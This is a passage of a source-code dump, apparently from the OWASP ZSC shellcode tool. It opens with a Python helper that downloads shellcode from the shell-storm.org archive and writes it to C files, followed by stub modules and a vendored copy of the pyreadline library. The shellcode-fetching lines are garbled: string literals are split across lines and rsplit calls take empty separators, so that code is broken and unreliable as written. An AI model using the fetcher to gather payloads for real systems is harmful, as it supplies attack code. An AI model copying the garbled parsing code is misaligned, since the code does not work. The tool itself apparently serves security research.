(str(id)) 61 | try: 62 | if version() is 2: 63 | data = urlopen(url).read().rsplit('
')[1].rsplit('')[0]
64 | 		if version() is 3:
65 | 			data = urlopen(url).read().decode('utf-8').rsplit('
')[
66 | 				1].rsplit('')[0]
67 | 	except:
68 | 		warn('connection error\n')
69 | 		return
70 | 
71 | 	write(_html_decode(data) + '\n\n')
72 | 
73 | 	if cli is False:
74 | 		file_or_not = _input('Shellcode output to a .c file?(y or n)', 'any', True)
75 | 		if file_or_not[0] == 'y':
76 | 			target = _input('Target .c file?', 'any', True)
77 | 			downloaded_file_output(target, _html_decode(data))
78 | 	else:
79 | 		if name != '':
80 | 			downloaded_file_output(name, _html_decode(data))
81 | 			
82 | def _grab_all():
83 | 	url = 'http://shell-storm.org/shellcode/'
84 | 	try:
85 | 		if version() is 2:
86 | 			data = urlopen(url).read().rsplit('\n')
87 | 		if version() is 3:
88 | 			data = urlopen(url).read().decode('utf-8').rsplit('\n')
89 | 	except:
90 | 		warn('connection error\n')
91 | 		return
92 | 	for shellcode in data:
93 | 		if '/shellcode/files/shellcode-' in shellcode:
94 | 			id = shellcode.rsplit('
  • ')[1].rsplit('')[0]
96 | 			author = shellcode.rsplit('')[1].rsplit('')[0]
97 | 			info('id: ' + id + ' - ' + title + ' ' + author + '\n')
98 | 


--------------------------------------------------------------------------------
/module/__init__.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | OWASP ZSC
 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project
 5 | https://github.com/zscproject/OWASP-ZSC
 6 | http://api.z3r0d4y.com/
 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ]
 8 | '''
 9 | 
10 | pass
11 | 


--------------------------------------------------------------------------------
/module/readline_osx/README.md:
--------------------------------------------------------------------------------
1 | https://pypi.python.org/pypi/readline/2.6.4


--------------------------------------------------------------------------------
/module/readline_osx/readline.py:
--------------------------------------------------------------------------------
 1 | def __bootstrap__():
 2 |     global __bootstrap__, __loader__, __file__
 3 |     import sys, pkg_resources, imp
 4 |     __file__ = pkg_resources.resource_filename(__name__, 'readline.so')
 5 |     __loader__ = None
 6 |     del __bootstrap__, __loader__
 7 |     imp.load_dynamic(__name__, __file__)
 8 | 
 9 | 
10 | __bootstrap__()
11 | 


--------------------------------------------------------------------------------
/module/readline_osx/readline.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OWASP/ZSC/f763deab754e5bb355c65d5eb90dbbbfc2a5d58a/module/readline_osx/readline.so


--------------------------------------------------------------------------------
/module/readline_windows/README.md:
--------------------------------------------------------------------------------
1 | http://pypi.python.org/pypi/pyreadline


--------------------------------------------------------------------------------
/module/readline_windows/__init__.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | OWASP ZSC
 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project
 5 | https://github.com/zscproject/OWASP-ZSC
 6 | http://api.z3r0d4y.com/
 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ]
 8 | '''
 9 | 
10 | pass
11 | 


--------------------------------------------------------------------------------
/module/readline_windows/pyreadline/__init__.py:
--------------------------------------------------------------------------------
 1 | # -*- coding: utf-8 -*-
 2 | #*****************************************************************************
 3 | #       Copyright (C) 2003-2006 Gary Bishop.
 4 | #       Copyright (C) 2006  Jorgen Stenarson. 
 5 | #
 6 | #  Distributed under the terms of the BSD License.  The full license is in
 7 | #  the file COPYING, distributed as part of this software.
 8 | #*****************************************************************************
 9 | from __future__ import print_function, unicode_literals, absolute_import
10 | 
11 | from . import unicode_helper
12 | from . import logger, clipboard, lineeditor, modes, console
13 | from .rlmain import *
14 | from . import rlmain
15 | 


--------------------------------------------------------------------------------
/module/readline_windows/pyreadline/clipboard/__init__.py:
--------------------------------------------------------------------------------
 1 | from __future__ import print_function, unicode_literals, absolute_import
 2 | import sys
 3 | success = True
 4 | in_ironpython = "IronPython" in sys.version
 5 | if in_ironpython:
 6 |     try:
 7 |         from .ironpython_clipboard import GetClipboardText, SetClipboardText
 8 |     except ImportError:
 9 |         from .no_clipboard import GetClipboardText, SetClipboardText
10 | 
11 | else:
12 |     try:
13 |         from .win32_clipboard import GetClipboardText, SetClipboardText
14 |     except ImportError:
15 |         from .no_clipboard import GetClipboardText, SetClipboardText
16 | 
17 | 
18 | def send_data(lists):
19 |     SetClipboardText(make_tab(lists))
20 | 
21 | 
22 | def set_clipboard_text(toclipboard):
23 |     SetClipboardText(str(toclipboard))
24 | 
25 | 
26 | def make_tab(lists):
27 |     if hasattr(lists, "tolist"):
28 |         lists = lists.tolist()
29 |     ut = []
30 |     for rad in lists:
31 |         if type(rad) in [list, tuple]:
32 |             ut.append("\t".join(["%s" % x for x in rad]))
33 |         else:
34 |             ut.append("%s" % rad)
35 |     return "\n".join(ut)
36 | 
37 | 
38 | def make_list_of_list(txt):
39 |     def make_num(x):
40 |         try:
41 |             return int(x)
42 |         except ValueError:
43 |             try:
44 |                 return float(x)
45 |             except ValueError:
46 |                 try:
47 |                     return complex(x)
48 |                 except ValueError:
49 |                     return x
50 |         return x
51 | 
52 |     ut = []
53 |     flag = False
54 |     for rad in [x for x in txt.split("\r\n") if x != ""]:
55 |         raden = [make_num(x) for x in rad.split("\t")]
56 |         if str in list(map(type, raden)):
57 |             flag = True
58 |         ut.append(raden)
59 |     return ut, flag
60 | 
61 | 
62 | def get_clipboard_text_and_convert(paste_list=False):
63 |     """Get txt from clipboard. if paste_list==True the convert tab separated 
64 |     data to list of lists. Enclose list of list in array() if all elements are 
65 |     numeric"""
66 |     txt = GetClipboardText()
67 |     if txt:
68 |         if paste_list and "\t" in txt:
69 |             array, flag = make_list_of_list(txt)
70 |             if flag:
71 |                 txt = repr(array)
72 |             else:
73 |                 txt = "array(%s)" % repr(array)
74 |             txt = "".join([c for c in txt if c not in " \t\r\n"])
75 |     return txt
76 | 


--------------------------------------------------------------------------------
/module/readline_windows/pyreadline/clipboard/ironpython_clipboard.py:
--------------------------------------------------------------------------------
 1 | # -*- coding: utf-8 -*-
 2 | #*****************************************************************************
 3 | #       Copyright (C) 2006  Jorgen Stenarson. 
 4 | #
 5 | #  Distributed under the terms of the BSD License.  The full license is in
 6 | #  the file COPYING, distributed as part of this software.
 7 | #*****************************************************************************
 8 | from __future__ import print_function, unicode_literals, absolute_import
 9 | import clr
10 | clr.AddReferenceByPartialName("System.Windows.Forms")
11 | import System.Windows.Forms.Clipboard as cb
12 | 
13 | 
14 | def GetClipboardText():
15 |     text = ""
16 |     if cb.ContainsText():
17 |         text = cb.GetText()
18 | 
19 |     return text
20 | 
21 | 
22 | def SetClipboardText(text):
23 |     cb.SetText(text)
24 | 
25 | 
26 | if __name__ == '__main__':
27 |     txt = GetClipboardText()  # display last text clipped
28 |     print(txt)
29 | 


--------------------------------------------------------------------------------
/module/readline_windows/pyreadline/clipboard/no_clipboard.py:
--------------------------------------------------------------------------------
 1 | # -*- coding: utf-8 -*-
 2 | #*****************************************************************************
 3 | #       Copyright (C) 2006  Jorgen Stenarson. 
 4 | #
 5 | #  Distributed under the terms of the BSD License.  The full license is in
 6 | #  the file COPYING, distributed as part of this software.
 7 | #*****************************************************************************
 8 | from __future__ import print_function, unicode_literals, absolute_import
 9 | 
10 | mybuffer = ""
11 | 
12 | 
13 | def GetClipboardText():
14 |     return mybuffer
15 | 
16 | 
17 | def SetClipboardText(text):
18 |     global mybuffer
19 |     mybuffer = text
20 | 


--------------------------------------------------------------------------------
/module/readline_windows/pyreadline/configuration/startup.py:
--------------------------------------------------------------------------------
 1 | # -*- coding: UTF-8 -*-
 2 | # Example snippet to use in a PYTHONSTARTUP file
 3 | from __future__ import print_function, unicode_literals, absolute_import
 4 | try:
 5 |     import pyreadline.rlmain
 6 |     #pyreadline.rlmain.config_path=r"c:\xxx\pyreadlineconfig.ini"
 7 |     import readline, atexit
 8 |     import pyreadline.unicode_helper
 9 |     #
10 |     #
11 |     #Normally the codepage for pyreadline is set to be sys.stdout.encoding
12 |     #if you need to change this uncomment the following line
13 |     #pyreadline.unicode_helper.pyreadline_codepage="utf8"
14 | except ImportError:
15 |     print("Module readline not available.")
16 | else:
17 |     #import tab completion functionality
18 |     import rlcompleter
19 | 
20 |     #Override completer from rlcompleter to disable automatic ( on callable
21 |     completer_obj = rlcompleter.Completer()
22 | 
23 |     def nop(val, word):
24 |         return word
25 | 
26 |     completer_obj._callable_postfix = nop
27 |     readline.set_completer(completer_obj.complete)
28 | 
29 |     #activate tab completion
30 |     readline.parse_and_bind("tab: complete")
31 |     readline.read_history_file()
32 |     atexit.register(readline.write_history_file)
33 |     del readline, rlcompleter, atexit
34 | 


--------------------------------------------------------------------------------
/module/readline_windows/pyreadline/console/__init__.py:
--------------------------------------------------------------------------------
 1 | from __future__ import print_function, unicode_literals, absolute_import
 2 | import glob, sys
 3 | 
 4 | success = False
 5 | in_ironpython = "IronPython" in sys.version
 6 | 
 7 | if in_ironpython:
 8 |     try:
 9 |         from .ironpython_console import *
10 |         success = True
11 |     except ImportError:
12 |         raise
13 | else:
14 |     try:
15 |         from .console import *
16 |         success = True
17 |     except ImportError:
18 |         pass
19 |         raise
20 | 
21 | if not success:
22 |     raise ImportError(
23 |         "Could not find a console implementation for your platform")
24 | 


--------------------------------------------------------------------------------
/module/readline_windows/pyreadline/console/console_attributes.py:
--------------------------------------------------------------------------------
 1 | from __future__ import print_function, unicode_literals, absolute_import
 2 | 
 3 | FOREGROUND_BLUE = 0x0001
 4 | FOREGROUND_GREEN = 0x0002
 5 | FOREGROUND_RED = 0x0004
 6 | FOREGROUND_INTENSITY = 0x0008
 7 | BACKGROUND_BLUE = 0x0010
 8 | BACKGROUND_GREEN = 0x0020
 9 | BACKGROUND_RED = 0x0040
10 | BACKGROUND_INTENSITY = 0x0080
11 | COMMON_LVB_LEADING_BYTE = 0x0100
12 | COMMON_LVB_TRAILING_BYTE = 0x0200
13 | COMMON_LVB_GRID_HORIZONTAL = 0x0400
14 | COMMON_LVB_GRID_LVERTICAL = 0x0800
15 | COMMON_LVB_GRID_RVERTICAL = 0x1000
16 | COMMON_LVB_REVERSE_VIDEO = 0x2000
17 | COMMON_LVB_UNDERSCORE = 0x4000
18 | 


--------------------------------------------------------------------------------
/module/readline_windows/pyreadline/console/consolebase.py:
--------------------------------------------------------------------------------
 1 | from __future__ import print_function, unicode_literals, absolute_import
 2 | 
 3 | 
 4 | class baseconsole(object):
 5 |     def __init__(self):
 6 |         pass
 7 | 
 8 |     def bell(self):
 9 |         raise NotImplementedError
10 | 
11 |     def pos(self, x=None, y=None):
12 |         '''Move or query the window cursor.'''
13 |         raise NotImplementedError
14 | 
15 |     def size(self):
16 |         raise NotImplementedError
17 | 
18 |     def rectangle(self, rect, attr=None, fill=' '):
19 |         '''Fill Rectangle.'''
20 |         raise NotImplementedError
21 | 
22 |     def write_scrolling(self, text, attr=None):
23 |         '''write text at current cursor position while watching for scrolling.
24 | 
25 |         If the window scrolls because you are at the bottom of the screen
26 |         buffer, all positions that you are storing will be shifted by the
27 |         scroll amount. For example, I remember the cursor position of the
28 |         prompt so that I can redraw the line but if the window scrolls,
29 |         the remembered position is off.
30 | 
31 |         This variant of write tries to keep track of the cursor position
32 |         so that it will know when the screen buffer is scrolled. It
33 |         returns the number of lines that the buffer scrolled.
34 | 
35 |         '''
36 |         raise NotImplementedError
37 | 
38 |     def getkeypress(self):
39 |         '''Return next key press event from the queue, ignoring others.'''
40 |         raise NotImplementedError
41 | 
42 |     def write(self, text):
43 |         raise NotImplementedError
44 | 
45 |     def page(self, attr=None, fill=' '):
46 |         '''Fill the entire screen.'''
47 |         raise NotImplementedError
48 | 
49 |     def isatty(self):
50 |         return True
51 | 
52 |     def flush(self):
53 |         pass
54 | 


--------------------------------------------------------------------------------
/module/readline_windows/pyreadline/console/event.py:
--------------------------------------------------------------------------------
 1 | from __future__ import print_function, unicode_literals, absolute_import
 2 | 
 3 | 
 4 | class Event(object):
 5 |     '''Represent events from the console.'''
 6 | 
 7 |     def __init__(self, console, input):
 8 |         pass
 9 | 
10 |     def __repr__(self):
11 |         '''Display an event for debugging.'''
12 |         if self.type in ['KeyPress', 'KeyRelease']:
13 |             chr = self.char
14 |             if ord(chr) < ord("A"):
15 |                 chr = "?"
16 |             s = "%s char='%s'%d keysym='%s' keycode=%d:%x state=%x keyinfo=%s" % \
17 |                    (self.type, chr, ord(self.char), self.keysym, self.keycode, self.keycode,
18 |                      self.state, self.keyinfo)
19 |         elif self.type in ['Motion', 'Button']:
20 |             s = '%s x=%d y=%d state=%x' % (self.type, self.x, self.y,
21 |                                            self.state)
22 |         elif self.type == 'Configure':
23 |             s = '%s w=%d h=%d' % (self.type, self.width, self.height)
24 |         elif self.type in ['FocusIn', 'FocusOut']:
25 |             s = self.type
26 |         elif self.type == 'Menu':
27 |             s = '%s state=%x' % (self.type, self.state)
28 |         else:
29 |             s = 'unknown event type'
30 |         return s
31 | 
32 | #    def __str__(self):
33 | #        return "('%s',%s,%s,%s)"%(self.char,self.key,self.state,self.keyinfo)
34 | 


--------------------------------------------------------------------------------
/module/readline_windows/pyreadline/error.py:
--------------------------------------------------------------------------------
 1 | # -*- coding: utf-8 -*-
 2 | #*****************************************************************************
 3 | #       Copyright (C) 2006  Jorgen Stenarson. 
 4 | #
 5 | #  Distributed under the terms of the BSD License.  The full license is in
 6 | #  the file COPYING, distributed as part of this software.
 7 | #*****************************************************************************
 8 | from __future__ import print_function, unicode_literals, absolute_import
 9 | 
10 | 
11 | class ReadlineError(Exception):
12 |     pass
13 | 
14 | 
15 | class GetSetError(ReadlineError):
16 |     pass
17 | 


--------------------------------------------------------------------------------
/module/readline_windows/pyreadline/get_doc.py:
--------------------------------------------------------------------------------
 1 | from __future__ import print_function, unicode_literals, absolute_import
 2 | import sys, textwrap
 3 | from .py3k_compat import callable
 4 | 
 5 | rlmain = sys.modules["readline"]
 6 | rl = rlmain.rl
 7 | 
 8 | 
 9 | def get_doc(rl):
10 |     methods = [(x, getattr(rl, x)) for x in dir(rl)
11 |                if callable(getattr(rl, x))]
12 |     return [(x, m.__doc__) for x, m in methods if m.__doc__]
13 | 
14 | 
15 | def get_rest(rl):
16 |     q = get_doc(rl)
17 |     out = []
18 |     for funcname, doc in q:
19 |         out.append(funcname)
20 |         out.append("\n".join(textwrap.wrap(doc, 80, initial_indent="   ")))
21 |         out.append("")
22 |     return out
23 | 


--------------------------------------------------------------------------------
/module/readline_windows/pyreadline/keysyms/__init__.py:
--------------------------------------------------------------------------------
 1 | from __future__ import print_function, unicode_literals, absolute_import
 2 | 
 3 | import sys
 4 | 
 5 | success = False
 6 | in_ironpython = "IronPython" in sys.version
 7 | from . import winconstants
 8 | 
 9 | if in_ironpython:
10 |     try:
11 |         from .ironpython_keysyms import *
12 |         success = True
13 |     except ImportError as x:
14 |         raise
15 | else:
16 |     try:
17 |         from .keysyms import *
18 |         success = True
19 |     except ImportError as x:
20 |         pass
21 | 
22 | if not success:
23 |     raise ImportError("Could not import keysym for local pythonversion", x)
24 | 


--------------------------------------------------------------------------------
/module/readline_windows/pyreadline/keysyms/winconstants.py:
--------------------------------------------------------------------------------
  1 | #This file contains constants that are normally found in win32all
  2 | #But included here to avoid the dependency
  3 | from __future__ import print_function, unicode_literals, absolute_import
  4 | 
  5 | VK_LBUTTON = 1
  6 | VK_RBUTTON = 2
  7 | VK_CANCEL = 3
  8 | VK_MBUTTON = 4
  9 | VK_XBUTTON1 = 5
 10 | VK_XBUTTON2 = 6
 11 | VK_BACK = 8
 12 | VK_TAB = 9
 13 | VK_CLEAR = 12
 14 | VK_RETURN = 13
 15 | VK_SHIFT = 16
 16 | VK_CONTROL = 17
 17 | VK_MENU = 18
 18 | VK_PAUSE = 19
 19 | VK_CAPITAL = 20
 20 | VK_KANA = 0x15
 21 | VK_HANGEUL = 0x15
 22 | VK_HANGUL = 0x15
 23 | VK_JUNJA = 0x17
 24 | VK_FINAL = 0x18
 25 | VK_HANJA = 0x19
 26 | VK_KANJI = 0x19
 27 | VK_ESCAPE = 0x1B
 28 | VK_CONVERT = 0x1C
 29 | VK_NONCONVERT = 0x1D
 30 | VK_ACCEPT = 0x1E
 31 | VK_MODECHANGE = 0x1F
 32 | VK_SPACE = 32
 33 | VK_PRIOR = 33
 34 | VK_NEXT = 34
 35 | VK_END = 35
 36 | VK_HOME = 36
 37 | VK_LEFT = 37
 38 | VK_UP = 38
 39 | VK_RIGHT = 39
 40 | VK_DOWN = 40
 41 | VK_SELECT = 41
 42 | VK_PRINT = 42
 43 | VK_EXECUTE = 43
 44 | VK_SNAPSHOT = 44
 45 | VK_INSERT = 45
 46 | VK_DELETE = 46
 47 | VK_HELP = 47
 48 | VK_LWIN = 0x5B
 49 | VK_RWIN = 0x5C
 50 | VK_APPS = 0x5D
 51 | VK_SLEEP = 0x5F
 52 | VK_NUMPAD0 = 0x60
 53 | VK_NUMPAD1 = 0x61
 54 | VK_NUMPAD2 = 0x62
 55 | VK_NUMPAD3 = 0x63
 56 | VK_NUMPAD4 = 0x64
 57 | VK_NUMPAD5 = 0x65
 58 | VK_NUMPAD6 = 0x66
 59 | VK_NUMPAD7 = 0x67
 60 | VK_NUMPAD8 = 0x68
 61 | VK_NUMPAD9 = 0x69
 62 | VK_MULTIPLY = 0x6A
 63 | VK_ADD = 0x6B
 64 | VK_SEPARATOR = 0x6C
 65 | VK_SUBTRACT = 0x6D
 66 | VK_DECIMAL = 0x6E
 67 | VK_DIVIDE = 0x6F
 68 | VK_F1 = 0x70
 69 | VK_F2 = 0x71
 70 | VK_F3 = 0x72
 71 | VK_F4 = 0x73
 72 | VK_F5 = 0x74
 73 | VK_F6 = 0x75
 74 | VK_F7 = 0x76
 75 | VK_F8 = 0x77
 76 | VK_F9 = 0x78
 77 | VK_F10 = 0x79
 78 | VK_F11 = 0x7A
 79 | VK_F12 = 0x7B
 80 | VK_F13 = 0x7C
 81 | VK_F14 = 0x7D
 82 | VK_F15 = 0x7E
 83 | VK_F16 = 0x7F
 84 | VK_F17 = 0x80
 85 | VK_F18 = 0x81
 86 | VK_F19 = 0x82
 87 | VK_F20 = 0x83
 88 | VK_F21 = 0x84
 89 | VK_F22 = 0x85
 90 | VK_F23 = 0x86
 91 | VK_F24 = 0x87
 92 | VK_NUMLOCK = 0x90
 93 | VK_SCROLL = 0x91
 94 | VK_LSHIFT = 0xA0
 95 | VK_RSHIFT = 0xA1
 96 | VK_LCONTROL = 0xA2
 97 | VK_RCONTROL = 0xA3
 98 | VK_LMENU = 0xA4
 99 | VK_RMENU = 0xA5
100 | VK_BROWSER_BACK = 0xA6
101 | VK_BROWSER_FORWARD = 0xA7
102 | VK_BROWSER_REFRESH = 0xA8
103 | VK_BROWSER_STOP = 0xA9
104 | VK_BROWSER_SEARCH = 0xAA
105 | VK_BROWSER_FAVORITES = 0xAB
106 | VK_BROWSER_HOME = 0xAC
107 | VK_VOLUME_MUTE = 0xAD
108 | VK_VOLUME_DOWN = 0xAE
109 | VK_VOLUME_UP = 0xAF
110 | VK_MEDIA_NEXT_TRACK = 0xB0
111 | VK_MEDIA_PREV_TRACK = 0xB1
112 | VK_MEDIA_STOP = 0xB2
113 | VK_MEDIA_PLAY_PAUSE = 0xB3
114 | VK_LAUNCH_MAIL = 0xB4
115 | VK_LAUNCH_MEDIA_SELECT = 0xB5
116 | VK_LAUNCH_APP1 = 0xB6
117 | VK_LAUNCH_APP2 = 0xB7
118 | VK_OEM_1 = 0xBA
119 | VK_OEM_PLUS = 0xBB
120 | VK_OEM_COMMA = 0xBC
121 | VK_OEM_MINUS = 0xBD
122 | VK_OEM_PERIOD = 0xBE
123 | VK_OEM_2 = 0xBF
124 | VK_OEM_3 = 0xC0
125 | VK_OEM_4 = 0xDB
126 | VK_OEM_5 = 0xDC
127 | VK_OEM_6 = 0xDD
128 | VK_OEM_7 = 0xDE
129 | VK_OEM_8 = 0xDF
130 | VK_OEM_102 = 0xE2
131 | VK_PROCESSKEY = 0xE5
132 | VK_PACKET = 0xE7
133 | VK_ATTN = 0xF6
134 | VK_CRSEL = 0xF7
135 | VK_EXSEL = 0xF8
136 | VK_EREOF = 0xF9
137 | VK_PLAY = 0xFA
138 | VK_ZOOM = 0xFB
139 | VK_NONAME = 0xFC
140 | VK_PA1 = 0xFD
141 | VK_OEM_CLEAR = 0xFE
142 | 
143 | CF_TEXT = 1
144 | CF_BITMAP = 2
145 | CF_METAFILEPICT = 3
146 | CF_SYLK = 4
147 | CF_DIF = 5
148 | CF_TIFF = 6
149 | CF_OEMTEXT = 7
150 | CF_DIB = 8
151 | CF_PALETTE = 9
152 | CF_PENDATA = 10
153 | CF_RIFF = 11
154 | CF_WAVE = 12
155 | CF_UNICODETEXT = 13
156 | CF_ENHMETAFILE = 14
157 | CF_HDROP = 15
158 | CF_LOCALE = 16
159 | CF_MAX = 17
160 | CF_OWNERDISPLAY = 128
161 | CF_DSPTEXT = 129
162 | CF_DSPBITMAP = 130
163 | CF_DSPMETAFILEPICT = 131
164 | CF_DSPENHMETAFILE = 142
165 | CF_PRIVATEFIRST = 512
166 | CF_PRIVATELAST = 767
167 | CF_GDIOBJFIRST = 768
168 | CF_GDIOBJLAST = 1023
169 | 
170 | GPTR = 64
171 | GHND = 66
172 | 


--------------------------------------------------------------------------------
/module/readline_windows/pyreadline/lineeditor/__init__.py:
--------------------------------------------------------------------------------
1 | from __future__ import print_function, unicode_literals, absolute_import
2 | 


--------------------------------------------------------------------------------
/module/readline_windows/pyreadline/logger.py:
--------------------------------------------------------------------------------
 1 | # -*- coding: utf-8 -*-
 2 | #*****************************************************************************
 3 | #       Copyright (C) 2006  Jorgen Stenarson. 
 4 | #
 5 | #  Distributed under the terms of the BSD License.  The full license is in
 6 | #  the file COPYING, distributed as part of this software.
 7 | #*****************************************************************************
 8 | from __future__ import print_function, unicode_literals, absolute_import
 9 | 
10 | import socket, logging, logging.handlers
11 | from pyreadline.unicode_helper import ensure_str
12 | 
13 | host = "localhost"
14 | port = logging.handlers.DEFAULT_TCP_LOGGING_PORT
15 | 
16 | pyreadline_logger = logging.getLogger('PYREADLINE')
17 | pyreadline_logger.setLevel(logging.DEBUG)
18 | pyreadline_logger.propagate = False
19 | formatter = logging.Formatter(str('%(message)s'))
20 | file_handler = None
21 | 
22 | 
23 | class NULLHandler(logging.Handler):
24 |     def emit(self, s):
25 |         pass
26 | 
27 | 
28 | class SocketStream(object):
29 |     def __init__(self, host, port):
30 |         self.logsocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
31 | 
32 |     def write(self, s):
33 |         self.logsocket.sendto(ensure_str(s), (host, port))
34 | 
35 |     def flush(self):
36 |         pass
37 | 
38 |     def close(self):
39 |         pass
40 | 
41 | 
42 | socket_handler = None
43 | pyreadline_logger.addHandler(NULLHandler())
44 | 
45 | 
46 | def start_socket_log():
47 |     global socket_handler
48 |     socket_handler = logging.StreamHandler(SocketStream(host, port))
49 |     socket_handler.setFormatter(formatter)
50 |     pyreadline_logger.addHandler(socket_handler)
51 | 
52 | 
53 | def stop_socket_log():
54 |     global socket_handler
55 |     if socket_handler:
56 |         pyreadline_logger.removeHandler(socket_handler)
57 |         socket_handler = None
58 | 
59 | 
60 | def start_file_log(filename):
61 |     global file_handler
62 |     file_handler = logging.FileHandler(filename, "w")
63 |     pyreadline_logger.addHandler(file_handler)
64 | 
65 | 
66 | def stop_file_log():
67 |     global file_handler
68 |     if file_handler:
69 |         pyreadline_logger.removeHandler(file_handler)
70 |         file_handler.close()
71 |         file_handler = None
72 | 
73 | 
74 | def stop_logging():
75 |     log("STOPING LOG")
76 |     stop_file_log()
77 |     stop_socket_log()
78 | 
79 | 
80 | def log(s):
81 |     s = ensure_str(s)
82 |     pyreadline_logger.debug(s)
83 | 


--------------------------------------------------------------------------------
/module/readline_windows/pyreadline/logserver.py:
--------------------------------------------------------------------------------
 1 | # -*- coding: utf-8 -*-
 2 | #*****************************************************************************
 3 | #       Copyright (C) 2006  Jorgen Stenarson. 
 4 | #
 5 | #  Distributed under the terms of the BSD License.  The full license is in
 6 | #  the file COPYING, distributed as part of this software.
 7 | #*****************************************************************************
 8 | from __future__ import print_function, unicode_literals, absolute_import
 9 | 
10 | import logging
11 | import logging.handlers
12 | import struct, socket
13 | from pyreadline.unicode_helper import ensure_unicode
14 | try:
15 |     import msvcrt
16 | except ImportError:
17 |     msvcrt = None
18 |     print("problem")
19 | 
20 | port = logging.handlers.DEFAULT_TCP_LOGGING_PORT
21 | host = 'localhost'
22 | 
23 | 
24 | def check_key():
25 |     if msvcrt is None:
26 |         return False
27 |     else:
28 |         if msvcrt.kbhit():
29 |             q = ensure_unicode(msvcrt.getch())
30 |             return q
31 |     return ""
32 | 
33 | 
34 | singleline = False
35 | 
36 | 
37 | def main():
38 |     print("Starting TCP logserver on port:", port)
39 |     print("Press q to quit logserver", port)
40 |     print("Press c to clear screen", port)
41 |     s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
42 | 
43 |     s.bind(("", port))
44 |     s.settimeout(1)
45 |     while 1:
46 |         try:
47 |             data, addr = s.recvfrom(100000)
48 |             print(data, end="")
49 |         except socket.timeout:
50 |             key = check_key().lower()
51 |             if "q" == key:
52 |                 print("Quitting logserver")
53 |                 break
54 |             elif "c" == key:
55 |                 print("\n" * 100)
56 | 
57 | 
58 | if __name__ == "__main__":
59 |     main()
60 | 


--------------------------------------------------------------------------------
/module/readline_windows/pyreadline/modes/__init__.py:
--------------------------------------------------------------------------------
1 | from __future__ import print_function, unicode_literals, absolute_import
2 | __all__ = ["emacs", "notemacs", "vi"]
3 | from . import emacs, notemacs, vi
4 | editingmodes = [emacs.EmacsMode, notemacs.NotEmacsMode, vi.ViMode]
5 | 
6 | #add check to ensure all modes have unique mode names
7 | 


--------------------------------------------------------------------------------
/module/readline_windows/pyreadline/py3k_compat.py:
--------------------------------------------------------------------------------
 1 | from __future__ import print_function, unicode_literals, absolute_import
 2 | import sys
 3 | 
 4 | if sys.version_info[0] >= 3:
 5 |     import collections
 6 |     PY3 = True
 7 | 
 8 |     def callable(x):
 9 |         return isinstance(x, collections.Callable)
10 | 
11 |     def execfile(fname, glob, loc=None):
12 |         loc = loc if (loc is not None) else glob
13 |         with open(fname) as fil:
14 |             txt = fil.read()
15 |         exec (compile(txt, fname, 'exec'), glob, loc)
16 | 
17 |     unicode = str
18 |     bytes = bytes
19 |     from io import StringIO
20 | else:
21 |     PY3 = False
22 |     callable = callable
23 |     execfile = execfile
24 |     bytes = str
25 |     unicode = unicode
26 | 
27 |     from StringIO import StringIO
28 | 


--------------------------------------------------------------------------------
/module/readline_windows/pyreadline/release.py:
--------------------------------------------------------------------------------
 1 | # -*- coding: utf-8 -*-
 2 | from __future__ import print_function, unicode_literals, absolute_import
 3 | """Release data for the pyreadline project.
 4 | 
 5 | $Id$"""
 6 | 
 7 | #*****************************************************************************
 8 | #       Copyright (C) 2006  Jorgen Stenarson. 
 9 | #
10 | #
11 | #  Distributed under the terms of the BSD License.  The full license is in
12 | #  the file COPYING, distributed as part of this software.
13 | #*****************************************************************************
14 | 
15 | # Name of the package for release purposes.  This is the name which labels
16 | # the tarballs and RPMs made by distutils, so it's best to lowercase it.
17 | name = 'pyreadline'
18 | 
19 | # For versions with substrings (like 0.6.16.svn), use an extra . to separate
20 | # the new substring.  We have to avoid using either dashes or underscores,
21 | # because bdist_rpm does not accept dashes (an RPM) convention, and
22 | # bdist_deb does not accept underscores (a Debian convention).
23 | 
24 | branch = ''
25 | 
26 | version = '2.1'
27 | 
28 | description = "A python implmementation of GNU readline."
29 | 
30 | long_description = \
31 | """
32 | The pyreadline package is a python implementation of GNU readline functionality
33 | it is based on the ctypes based UNC readline package by Gary Bishop.
34 | It is not complete. It has been tested for use with windows 2000 and windows xp.
35 | 
36 | * pyreadline 2.1 <2015-09-16>
37 | 
38 |   This is a bugfix release to make pyreadline work with python 3.5.
39 | 
40 |   Contributors to this release:
41 | 
42 |     - Jörgen Stenarson, maintainer
43 |     - kivhift, improved error message for running on non windows platforms
44 |     - zooba, made helpful suggestions to make it work for python 3.5
45 | 
46 |   Version 2.1 of pyreadline has been verfied for Python 2.7, and 3.4, 3.5.
47 | 
48 | 
49 | Features:
50 |  *  keyboard text selection and copy/paste
51 |  *  Shift-arrowkeys for text selection
52 |  *  Control-c can be used for copy activate with allow_ctrl_c(True) in config file
53 |  *  Double tapping ctrl-c will raise a KeyboardInterrupt, use ctrl_c_tap_time_interval(x)
54 |     where x is your preferred tap time window, default 0.3 s.
55 |  *  paste pastes first line of content on clipboard.
56 |  *  ipython_paste, pastes tab-separated data as list of lists or numpy array if all data is numeric
57 |  *  paste_mulitline_code pastes multi line code, removing any empty lines.
58 | 
59 | 
60 |  The latest development version is always available at the IPython github
61 |  repository_.
62 | 
63 | .. _repository: https://github.com/pyreadline/pyreadline.git
64 |  """
65 | 
66 | license = 'BSD'
67 | 
68 | authors = {'Jorgen': ('Jorgen Stenarson', 'jorgen.stenarson@kroywen.se'),
69 |            'Gary': ('Gary Bishop', ''),
70 |            'Jack': ('Jack Trainor', ''), }
71 | 
72 | url = 'http://ipython.org/pyreadline.html'
73 | download_url = 'https://pypi.python.org/pypi/pyreadline/'
74 | platforms = ['Windows XP/2000/NT', 'Windows 95/98/ME']
75 | 
76 | keywords = ['readline', 'pyreadline']
77 | 
78 | classifiers = ['Development Status :: 5 - Production/Stable',
79 |                'Environment :: Console',
80 |                'Operating System :: Microsoft :: Windows',
81 |                'License :: OSI Approved :: BSD License',
82 |                'Programming Language :: Python :: 2.7',
83 |                'Programming Language :: Python :: 3.2',
